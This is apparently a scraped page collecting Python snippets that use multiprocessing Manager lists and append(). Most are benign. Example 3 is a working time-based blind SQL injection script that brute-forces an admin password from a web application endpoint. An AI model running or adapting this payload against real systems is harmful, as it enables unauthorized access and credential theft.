

Python Manager.append method code examples

This article collects typical usage examples of the Python multiprocessing.Manager.append method. If you are wondering what exactly Manager.append does, how to call it, or what real-world usage looks like, the curated code examples below may help. You can also explore further usage examples of the enclosing multiprocessing.Manager class.


The following presents 15 code examples of the Manager.append method, sorted by popularity by default.
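Before the examples, here is a minimal sketch (not taken from any of the projects below) of the pattern they all rely on: a list proxy created by Manager() is passed to child processes, each child calls append() on it, and the parent sees every appended item after join().

from multiprocessing import Manager, Process

def worker(shared, worker_id):
    # append() is forwarded to the manager process, so it is safe to call from any process
    shared.append(worker_id)

if __name__ == '__main__':
    manager = Manager()
    shared = manager.list()
    workers = [Process(target=worker, args=(shared, i)) for i in range(4)]
    for p in workers:
        p.start()
    for p in workers:
        p.join()
    print(list(shared))  # e.g. [0, 1, 3, 2] -- all four ids, order not guaranteed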

Example 1: sampleWithDistInfo_boundStrat_multiThread

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
    def sampleWithDistInfo_boundStrat_multiThread(self, num):
        """Randomly sample one configuration in the C-space first (get a sphere),
        then add that sphere to the result set.
        Repeat:
            sample the boundary of the sphere set;
            add the new sphere to the set
        until the terminate condition is met.

        @param num: total number of spheres, used as the terminate condition.
                    TODO: find a terminate condition that can be used to evaluate sphere coverage
        """
        try:
            #self.mDistSamples = Manager().list();
            self.g_failTimes.value = 0;
            boundaryQueue = multiprocessing.Queue();
            dictProxy = Manager().list()
            dictProxy.append({});

            threads = [];
            threadsCount = 1;
            for i in range(0,threadsCount):
                newThread = Process( target=self.__mltithreadDistSample_boundStrat__, args=[ i, dictProxy, boundaryQueue,num ] );
                threads += [newThread];
            for i in range( 0,threadsCount ):
                threads[i].start();
            for i in range( 0,threadsCount ):
                threads[i].join();

            print "Get {0} samples".format( len(self.mDistSamples) );

        except Exception, msg:
            print "Failed to start a thread, MSG:\n\t" + str(msg);
            self.g_failTimes.value = 0;
Author: IanZhang1990, Project: Robotics-MotionPlanning, Lines: 34, Source: SampleManager_old.py

Example 2: __init__

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class MemStorage:
    def __init__(self, config):
        self.config = config
        self.measures = Manager().list()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        pass

    def save(self, measure):
        self.measures.append(measure)

    def last(self):
        if len(self.measures) <= 0:
            return None

        return self.measures[-1]

    def __str__(self):
        buf = "<{} measures: [".format(self.__class__)
        for item in self.measures:
            buf += "'{}'".format(item)
        buf += "]>"

        return buf
Author: skoenen, Project: pyprol, Lines: 29, Source: fixture.py
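A possible usage sketch for the MemStorage fixture above; the config value and the measure dictionaries passed to save() are made up for illustration, and the class plus its Manager import are assumed to be in scope.

if __name__ == '__main__':
    with MemStorage(config=None) as storage:
        storage.save({'elapsed': 0.12})   # appended to the shared Manager list
        storage.save({'elapsed': 0.34})
        print(storage.last())             # {'elapsed': 0.34}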

Example 3: GuessPassword

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class GuessPassword(object):
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # cannot write self.stop_flag[0] = False here; on an empty Manager list that raises IndexError
        for _ in range(1, self.passwd_length):
            self.queue.put(_)

    def exploit(self):
        while not self.queue.empty() and not self.stop_flag[0]:
            passwd_position = self.queue.get()
            for _guess_char in range(33, 128):
                payload = self.payload.format(position=passwd_position, guess_char=_guess_char)
                exp_data = {'sid': payload}
                try:
                    res = requests.post(self.url, data=exp_data, cookies=self.cookie, timeout=self.timeout)
                except requests.ReadTimeout:
                    self.lock.acquire()
                    self.result[passwd_position] = chr(_guess_char)
                    print "Data %dth: %s" % (passwd_position, self.result[passwd_position])
                    self.lock.release()
                    break

    def run(self):

        for _ in range(self.processes):
            _worker = Process(target=self.exploit)
            # _worker.daemon = True
            _worker.start()

        try:
            while len(multiprocessing.active_children()) > 2:
                # Why > 2 instead of > 0? After all worker subprocesses have finished, two child
                # processes are still running: the two Manager subprocesses used to share data
                # between processes. multiprocessing.active_children() returns a list of the
                # currently active child process objects.
                # self.lock.acquire()
                # print len(multiprocessing.active_children())
                # self.lock.release()
                time.sleep(1)
        except KeyboardInterrupt:
            self.lock.acquire()
            print 'wait for all subprocess stop......'
            self.stop_flag[0] = True
            self.lock.release()

        else:
            print self.result
            print 'finish'
Author: Arryboom, Project: x386, Lines: 58, Source: Multiprocess_Brute.py
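The comment on stop_flag in Example 3 points at a common gotcha: a freshly created Manager().list() is empty, so assigning to index 0 raises IndexError and the slot has to be created with append() first. A minimal sketch of that behavior, independent of the exploit code above:

from multiprocessing import Manager

manager = Manager()
stop_flag = manager.list()
# stop_flag[0] = False   # would raise IndexError: list assignment index out of range
stop_flag.append(False)  # create slot 0 with append()
stop_flag[0] = True      # index assignment now works and is visible to every process
print(stop_flag[0])      # True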

Example 4: JobManager

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class JobManager(threading.Thread):
    def __init__(self, num_workers, worker_name):
        threading.Thread.__init__(self, name=worker_name)

        self.pool = Pool(num_workers=num_workers, name=worker_name)

        if os.name == 'nt':
            self.in_progress_jobs = []
            self.lock = threading.RLock()
        else:
            self.in_progress_jobs = Manager().list()
            self.lock = Manager().Lock()

    def run(self):
        while 1:
            try:
                time.sleep(20)
                self.dispatch()
            except Exception:
                # Print to debug console instead of to DB.
                import traceback
                print(traceback.format_exc())

    def dispatch(self):
        raise NotImplementedError("Children must override dispatch()")

    def submit_job(self, work_unit):
        with self.lock:
            if work_unit.get_unique_key() in self.in_progress_jobs:
                return False

            self.in_progress_jobs.append(work_unit.get_unique_key())

        # Remember these shared memory references
        work_unit.in_progress_jobs = self.in_progress_jobs
        work_unit.lock = self.lock

        self.pool.submit(work_unit)

        return True
Author: anushreejangid, Project: csm, Lines: 42, Source: job_manager.py
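A hedged sketch of the deduplication pattern used by submit_job() in Example 4: the membership test and the append() happen under one shared lock, so two processes cannot claim the same job key. The names submit_once and 'job-42' are illustrative and not part of the original project.

from multiprocessing import Manager, Process

def submit_once(in_progress, lock, key):
    with lock:
        if key in in_progress:   # another process already claimed this key
            return False
        in_progress.append(key)  # claim it; atomic with respect to other submitters
    return True

if __name__ == '__main__':
    manager = Manager()
    in_progress = manager.list()
    lock = manager.Lock()
    procs = [Process(target=submit_once, args=(in_progress, lock, 'job-42'))
             for _ in range(3)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    print(list(in_progress))  # ['job-42'] -- appended exactly once despite three submitters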

Example 5: Analyzer

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()
            sock.connect((settings.CARBON_HOST.replace('http://', ''), settings.CARBON_PORT))
            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
#......... part of the code is omitted here .........
Author: jxwr, Project: skyline, Lines: 103, Source: analyzer.py

Example 6: Boundary

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class Boundary(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Boundary
        """
        super(Boundary, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.boundary_metrics = Manager().list()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()

            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
            except socket.error:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error('Cannot connect to Graphite at %s' % endpoint)
                return False

            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def unique_noHash(self, seq):
        seen = set()
        return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

    # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True
    # for dumping the metric timeseries data into for debugging purposes
    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        except OSError as exc:
            # Python >2.5
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def spin_process(self, i, boundary_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Determine assigned metrics
        bp = settings.BOUNDARY_PROCESSES
        bm_range = len(boundary_metrics)
        keys_per_processor = int(ceil(float(bm_range) / float(bp)))
        if i == settings.BOUNDARY_PROCESSES:
            assigned_max = len(boundary_metrics)
        else:
            # This is a skyline bug: the original skyline code uses 1 as the
            # starting position of the index, but Python indices begin with 0
            # assigned_max = len(boundary_metrics)
            # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014
            # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment
            assigned_max = min(len(boundary_metrics), i * keys_per_processor)
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys]
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing assigned_metrics_and_algos')
            for assigned_metric_and_algo in assigned_metrics_and_algos:
                logger.info('debug - assigned_metric_and_algo - %s' % str(assigned_metric_and_algo))

        # Compile assigned metrics
        assigned_metrics = []
        for i in assigned_metrics_and_algos:
            assigned_metrics.append(i[0])

        # unique unhashed things
        def unique_noHash(seq):
            seen = set()
            return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

        unique_assigned_metrics = unique_noHash(assigned_metrics)

        if ENABLE_BOUNDARY_DEBUG:
#......... part of the code is omitted here .........
Author: gaos1, Project: skyline, Lines: 103, Source: boundary.py

Example 7: print

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
    print()
    system('setterm -cursor on') # show the cursor again if CTRL+C is pressed
    exit(0)



snake_list = []
snake_direction = Manager().Value('ctypes.c_char_p', "right")   ## variable shared with the other process
snake_blocks = Manager().Value('i', 2)
game_speed = Manager().Value('f', .5)

posLargSnake = Manager().Value('i', 1)
posLongSnake = Manager().Value('i', 1)

snake_head = Manager().list()
snake_head.append(1)
snake_head.append(2)

point_pos = Manager().list()
score = Manager().Value('i', 0)
game_over = Manager().Value('b', False)
pause = Manager().Value('b', False)
printed_pause = Manager().Value('b', True)
touche = Manager().Value('i', 0)

colored_space = Manager().Value('ctypes.c_char_p', colored(' ', 'grey', 'on_grey'))
colored_snake_body = Manager().Value('ctypes.c_char_p', colored('x', 'green', 'on_green'))
colored_snake_head = Manager().Value('ctypes.c_char_p', colored('x', 'white', 'on_white'))
colored_point = Manager().Value('ctypes.c_char_p', colored('o', 'red', 'on_red'))

signal.signal(signal.SIGINT, quit)
Author: roscale, Project: snake, Lines: 33, Source: snake.py
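A small sketch of the shared-state pattern in Example 7: Manager().Value holds a scalar that a child process mutates while the parent reads it, and the snake head is a Manager().list() whose slots are created with append() before they can be assigned by index. The mover() function and the values are illustrative only.

from multiprocessing import Manager, Process

def mover(direction, head):
    direction.value = "up"   # visible to the parent process
    head[0] += 1             # index assignment works once the slot exists

if __name__ == '__main__':
    manager = Manager()
    direction = manager.Value('ctypes.c_char_p', "right")
    head = manager.list()
    head.append(1)           # create the two coordinate slots with append()
    head.append(2)
    p = Process(target=mover, args=(direction, head))
    p.start()
    p.join()
    print(direction.value, list(head))  # up [2, 2]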

Example 8: Worker

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class Worker(object):

    def __init__(self, fname, output_file):
        self.fname = fname
        self.split_files = None
        '''
        self.db_instance = Utility.tinydb_instance()
        '''
        self.undefined_list = Manager().list()
        self.defined_list = Manager().list()
        self.lines_to_be = 0
        self.output = {}
        self.opfile = output_file

    def data_process(self):
        """
        Process the data: count the lines in the file and split the file into chunks
        based on the line count, one chunk per CPU core on the machine.
        :returns: Nothing
        """
        logging.info('Processing the data and split files')
        lines = Utility.file_len(self.fname)
        self.lines_to_be, self.split_files = Utility.split_files(self.fname, lines,
                                                                 cpu_count().real)

    def clean_json(self, line_no, row):
        """
        Initial cleaning to reduce overhead for the parser.
        Each line should have either 4 or 5 comma-separated fields.
        :param line_no:  Line number from the file
        :param row: the document to process
        :return: Boolean
        """
        if len(row) not in [4, 5]:
            return False
        return True

    def parse_json(self, fname):
        """
        The core function: it creates a ParseDoc object and parses each document.
        The output is written to a shared-memory list.
        :param fname:
        :return: Nothing
        """
        dp = DocProcess(fname, self.lines_to_be)
        dp.read_csv()
        parser_doc = ParseDoc()
        for line_no, row in dp.next():
            row_list = row.split(',')
            if self.clean_json(line_no, row_list):
                value = parser_doc.parse_machine(row_list)
                if value:
                    self.defined_list.append(value)
                else:
                    self.undefined_list.append(line_no)
            else:
                self.undefined_list.append(line_no)

    def mapper(self):
        workers = []
        for s_file in self.split_files:
            worker_process = Process(target=self.parse_json, args=(s_file, ))
            workers.append(worker_process)
            worker_process.start()

        [worker.join() for worker in workers]

    def reducer(self):
        self.output["entries"] = list(self.defined_list)
        self.output["errors"] = list(self.undefined_list)

        self.output["errors"].sort()
        new_list = sorted(self.output["entries"], key=itemgetter('lastname'))
        self.output["entries"] = new_list

        with open(self.opfile, 'w') as f:
            pprint.pprint(self.output, f, indent=2)

    def run(self):
        self.mapper()
        self.reducer()
Author: sandipnd, Project: Algorithms, Lines: 84, Source: worker.py
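A hedged sketch of the reduce step in Example 8: items appended by the worker processes live in Manager list proxies, so they are copied into plain lists with list() before sorting and writing, which avoids a round trip to the manager process for every element. The sample records are made up.

from multiprocessing import Manager
from operator import itemgetter

manager = Manager()
defined_list = manager.list()
defined_list.append({'lastname': 'smith', 'line': 2})
defined_list.append({'lastname': 'adams', 'line': 1})

entries = sorted(list(defined_list), key=itemgetter('lastname'))  # plain list from here on
print(entries)  # [{'lastname': 'adams', 'line': 1}, {'lastname': 'smith', 'line': 2}]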

Example 9: Mirage

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class Mirage(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Mirage
        """
        super(Mirage, self).__init__()
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.mirage_exceptions_q = Queue()
        self.mirage_anomaly_breakdown_q = Queue()
        self.not_anomalous_metrics = Manager().list()
        self.metric_variables = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        # Python >2.5
        except OSError as exc:
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until):
        # We use absolute time so that if there is a lag in mirage the correct
        # timeseries data is still surfaced relevant to the anomalous datapoint
        # timestamp
        if settings.GRAPHITE_PORT != '':
            url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                str(settings.GRAPHITE_PORT), graphite_from, graphite_until,
                metric_name)
        else:
            url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                graphite_from, graphite_until, metric_name)
        r = requests.get(url)
        js = r.json()
        datapoints = js[0]['datapoints']

        converted = []
        for datapoint in datapoints:
            try:
                new_datapoint = [float(datapoint[1]), float(datapoint[0])]
                converted.append(new_datapoint)
            except:
                continue

        parsed = urlparse.urlparse(url)
        target = urlparse.parse_qs(parsed.query)['target'][0]

        metric_data_folder = settings.MIRAGE_DATA_FOLDER + "/" + target
        self.mkdir_p(metric_data_folder)
        with open(metric_data_folder + "/" + target + '.json', 'w') as f:
            f.write(json.dumps(converted))
            f.close()
            return True

        return False

    def load_metric_vars(self, filename):
        if os.path.isfile(filename) == True:
            f = open(filename)
            global metric_vars
            metric_vars = imp.load_source('metric_vars', '', f)
            f.close()
            return True

        return False

    def spin_process(self, i, run_timestamp):
        """
        Assign a metric for a process to analyze.
        """

        # Discover metric to analyze
        metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]

        # Check if this process is unnecessary
        if len(metric_var_files) == 0:
            return

        metric_var_files_sorted = sorted(metric_var_files)
        metric_check_file = '%s/%s' % (
            settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0]))

        # Load metric variables
#......... part of the code is omitted here .........
Author: blak3r2, Project: skyline, Lines: 103, Source: mirage.py

Example 10: __init__

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]

#......... part of the code is omitted here .........
            for sample in self.mDistSamples:
                if sample.isInside( (rnd1, rnd2), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
                    newSamp = False;
                    failTime += 1
                    break;
            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd1, rnd2, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(72);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample(rnd1, rnd2, dist);
                    #(self.mDistSamples).append( newDistSamp );
                    print "failed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;

    ###=======================================================================================
    ###=== Strategy 2: Randomly sample one sphere, then sample from the boundary
    ###===         Then keep sampling the new boundary of the set of spheres
    def distSampleOneThread( self, num, imgSurface=None ):
        self.mDistSamples = [];
        boundaryQueue = Queue();
        bndSphDict = defaultdict();

        randFreeSamp = 1234;
        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num );
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            self.drawDistSample(imgSurface, (randFreeSamp.mSample[0],randFreeSamp.mSample[1]), randFreeSamp.mRadius);
            bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                bndSphDict[bndConfig] = randFreeSamp;
                boundaryQueue.put( bndConfig );				# put the boundary config to the queue.

            while( not boundaryQueue.empty() ):
                #print "Size of dist samples {0}".format( len( self.mDistSamples ) );
     #           if( len(self.mDistSamples) % 100 == 0 ):
                    #randFreeSamp = self.getARandomFreeSample( num );
                    #if( randFreeSamp == None ):
                    #	return;
                    #(self.mDistSamples).append( randFreeSamp )
                    #bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);		# get the boundary configs
                    #for bndConfig in bounds:
                    #	#if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                    #	bndSphDict[bndConfig] = newDistSamp;
                    #	boundaryQueue.put( bndConfig );				# put the boundary config to the queue.


                bnd = boundaryQueue.get();							# get a new boundary  
                newSamp = True;
                if self.mCollisionMgr.ifCollide((bnd[0], bnd[1])):
                    continue;
                for sample in self.mDistSamples:
                    if sample.isInside( (bnd[0], bnd[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):  # NOTE: candidate spot for a locality-sensitive hash
                        # check if within any spheres, not including the sphere that the boundary config belongs to.
                        newSamp = False;
                        break;
Author: IanZhang1990, Project: Robotics-MotionPlanning, Lines: 69, Source: SampleManager.py

Example 11: SharedData

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class SharedData(object):
    """
    Handles shared statistical data, which we want to collect over several
    executions of the ccdetection tool.
    Only shared values are used, so that multiple child processes 
    can manipulate them.
    """

    KEY_NODES   = "nodes_total"
    KEY_INPATH  = "in_path"
    KEY_CLONES  = "clones"
    KEY_COUNTER = "counter"
    KEY_QUERY_TIME = "query_time_total"
    KEY_FIRST_COUNTER = "first_query_counter"
    KEY_PROJECTS_COUNTER = "projects_counter"
    KEY_FIRST_QUERY_TIME = "first_query_time_total"

    def __init__(self, path, lock, in_path=None):
        """
        Setup all values to be shared (between processes) values.
        """
        self.lock = lock
        self.path = path
        
        if os.path.isfile(path):
            self.loadData()
            
        else:
            self.in_path = in_path
            self.clones = Manager().list()
            self.counter = Value("i", 0)
            self.nodes_total = Value("i", 0)            
            self.first_counter = Value("i", 0)
            self.query_time_total = Value("d", 0)
            self.projects_counter = Value("i", 0)
            self.first_query_time_total = Value("d", 0)
    
    def incProjectsCounter(self):
        """
        Increase the counter of projects analysed.
        """
        self.projects_counter.value += 1
    
    def addQuery(self, query_time, first=False):
        """
        Add the statistical data of a query that did not find a code clone.
        """
        if first:
            self.first_counter.value += 1
            self.first_query_time_total.value += query_time
             
        else:
            self.counter.value += 1
            self.query_time_total.value += query_time
            
    def addFoundCodeClone(self, code_clone_data, first=False):
        """
        Add the statistical data of a query that did find a code clone.
        """
        self.addQuery(code_clone_data.getQueryTime(), first)
        self.clones.append(code_clone_data)
        
    def loadData(self):
        with open(self.path, "rb") as fh:
            data = pickle.load(fh)
            
        # Restore state from load data.
        self.in_path = data[self.KEY_INPATH]
        self.clones  = Manager().list(data[self.KEY_CLONES])
        self.counter = Value("i", data[self.KEY_COUNTER])
        self.nodes_total = Value("i", data[self.KEY_NODES])
        self.first_counter = Value("i", data[self.KEY_FIRST_COUNTER])
        self.query_time_total = Value("d", data[self.KEY_QUERY_TIME])
        self.projects_counter = Value("i", data[self.KEY_PROJECTS_COUNTER])
        self.first_query_time_total = Value("d", data[self.KEY_FIRST_QUERY_TIME])
            
    def saveData(self, queries, code_clones):
        """
        Save the data of an analysed project to file.
        To avoid conflicts of multiple processes adding and saving data
        at the same time, we save all data atomically and using a lock, which
        prevents multiple executions at once.
        """
        self.lock.acquire()
        # Increase projects counter.
        self.incProjectsCounter()    
        
        
        # Add all query data.
        for query_dict in queries:
            self.addQuery(query_dict["query_time"], query_dict["first"])

        # Add all data from found code clones
        for clone_dict in code_clones:
            self.addFoundCodeClone(clone_dict["clone"], clone_dict["first"])
        
        self.saveToFile(self.path)
        
        self.lock.release()

#......... part of the code is omitted here .........
Author: tommiu, Project: ccdetection, Lines: 103, Source: shared_data.py

Example 12: KarnaughMap

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]

#......... part of the code is omitted here .........
                    best=self.blocks
                    bestc=len(best)
                    bestsc=sc

                else:

                    if( sc>bestsc ):

                        best=self.blocks
                        bestc=len(best)
                        bestsc=sc




        self.blocks=best


    def Solve2(self, completion):

        def Join(a,i):
            CompBlocks = [block for block in blocks if self.IsJoinable(a.values, block.values )]
            for b in CompBlocks:
                x=self.IsJoinable(a.values, b.values )
                if(x>0):
                    #/* If they can be joined, make a new block with 2 in place
                    #of the one bit where a and b differ */
                    n = KarnaughNode()
                    n.numberOfItems=a.numberOfItems*2
                    n.flag = False
                    for j in range(0, len(a.values) ):

                        if(j!=(x-1)):
                            n.values.append(a.values[j] )
                        else:
                            n.values.append( 2 )

                    #/* Mark that a node is part of a larger node */
                    a.flag=True
                    b.flag=True

                    #/* Check if that block already exists in the list */
                    exist=False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True

                    if(not exist):
                        self.blocks.append(n )
        def CleanProcess():
            for process in ProcessList:
                process.join()

            for process in ProcessList:
                jn = resultQueue.get()
                for n in jn.newblocks:
                    exist = False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True
                    if(not exist):
                        self.blocks.append(n )
                for b in jn.removeblocks:
                    for c in self.blocks:
                        if(b.values==c.values):
                            self.blocks.remove(c)
Author: trilomix, Project: kmappy, Lines: 70, Source: karnaughmap.py

Example 13: __init__

# Required import: from multiprocessing import Manager [as alias]
# Or: from multiprocessing.Manager import append [as alias]
class SampleManager:
    def __init__( self, CSpace ):
        self.mCSpace = CSpace;
        self.mCollisionMgr = CSpace.mCollisionMgr;
        self.mDistSamples = Manager().list();
        self.mFreeSamples = [];
        self.mObstSamples = [];
        self.g_failTimes = Value( 'i', 0 );
        unitLens = [100] * len( self.mCSpace.mMaxDimLens )
        self.mSpacePartition = SpacePartition( self.mCSpace.mMaxDimLens, unitLens );

    def getFreeSamples( self, num, dim, maxDimLens ):
        """get num number of free samples in C-Space"""
        size = 0; 
        while size < num:
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
                size += 1;

    def randomSample( self, num, dim, maxDimLens ):
        for i in range( 0, num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #config = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
            else:
                self.mObstSamples.append( rnd );
     
    def getARandomFreeSample(self, num, maxDimLens, dim):
        """Randomly sample the space and return a free sample (with distance info).
         The sample is not inside any other sphere. Note that this method does not
         automatically add the new sample to the self.mDistSamples list.
         @param num: failure limit; if no such sample is found after num attempts, return None"""
        failTime=0;
        while( failTime < num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( self.mCollisionMgr.ifCollide( rnd ) ):
                continue;

            newSamp = True;

            grid = self.mSpacePartition.getContainingGrid( rnd );
            for sphere in grid.mContainer:
                if sphere.isInside( rnd ):
                    newSamp = False;
                    failTime += 1
                    break;

            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(50 * 2);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample( rnd, dist );
                    print "------>\tfailed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;
           

    def distSampleUsingObstSurfSamps( self, num, maxDimLens ):
        """@param num: failure time to sample a new configuration randomly"""

        self.randomSample( 100, len(maxDimLens), maxDimLens );
        searcher = ObstSurfSearcher(self.mCollisionMgr, self.mCSpace);
        searcher.searchObstSurfConfigs( self.mFreeSamples, self.mObstSamples, 2 );

        self.mDistSamples = [];
        boundaryQueue = [];
        bndSphDict = defaultdict();
        randFreeSamp = 1234;

        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num, maxDimLens, 2);
            if( randFreeSamp == None ):
                return;
